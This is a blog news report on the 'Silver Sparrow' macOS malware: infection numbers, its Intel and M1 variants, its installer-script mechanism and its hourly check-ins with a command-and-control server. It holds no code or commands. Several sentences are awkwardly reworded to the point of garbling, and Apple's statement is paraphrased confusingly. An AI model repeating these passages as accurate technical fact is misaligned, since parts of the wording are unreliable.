BLOG: 30,000 Macbooks Infected By New “Silver Sparrow” Malware

There is popular belief that Apple made computers are mostly resistant to any type of malware, however as of recently it appears that advanced hackers and threat actors may have debunked this theory. Researchers have now unveiled another previously concealed piece of malicious software that was found in about 30,000 Macs running Intel x86_64 and the iPhone maker’s M1 processors. 

However, the aim of this type of malware remains somewhat of a dilemma, researchers are currently unsure of its distribution timeline and whether the threat is just under active development. 

The malware, dubbed the “Silver Sparrow,” by industry professionals, has been described as having two different versions of the malware, one version compiled only for Intel x86_64 and uploaded to VirusTotal on August 31, 2020 (version 1), and a second variant submitted to the database on January 22 that’s compatible with both Intel x86_64 and M1 ARM64 architectures (version 2). Upon execution, the x86_64 binary, displays the message “Hello, World!” whereas the M1 binary reads “You did it!,” which the researchers suspect is being used as a placeholder. 

The industry professionals  explained that Mach-O compiled binaries don’t appear to “do all that much” and as a result they have been labelled ‘bystander binaries’. Researchers also explained that there is no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution. 

The 29,139 macOS endpoints are located across 153 countries as of February 17, comprising high-ranking volumes of exposure within the United States, the United Kingdom, Canada, France, and Germany, according to data from Malwarebytes. 

In spite of the difference in the pursued macOS platform, the two samples follow the same modus operandi: using the macOS Installer JavaScript API to execute attack commands by dynamically generating two shell scripts that are written to the target’s file system. 

While “agent.sh” executes immediately at the end of the installation to inform an AWS command-and-control (C2) server of a successful installation, “verx.sh” runs once every hour, contacting the C2 server for additional content to download and execute. 

Additionally, the malware also comes with the capabilities to completely erase its presence from the compromised host, suggesting that the threat actors associated with this operation may be motivated by stealth techniques. 

Silver Sparrow is an upcoming section of malware to include code that runs inhabitant on Apple’s new M1 chip. Silver Sparrow has not yet delivered additional malicious actions, but its compatibility with the M1 chip, widespread global reach, relatively high infection rate, and operational maturity suggests that Silver Sparrow is a threat that has been distinctively situated to convey a prospective impactful payload at a moment’s notice. 

Apple released a statement notifying customers and the general public that any software downloaded outside of the Mac App Store uses technical mechanisms to identify malware and then block it so that it can’t operate. With the consistent newly founded malware, it creates the idea that we may reach a stage where advanced malware will be harder to detect and remove.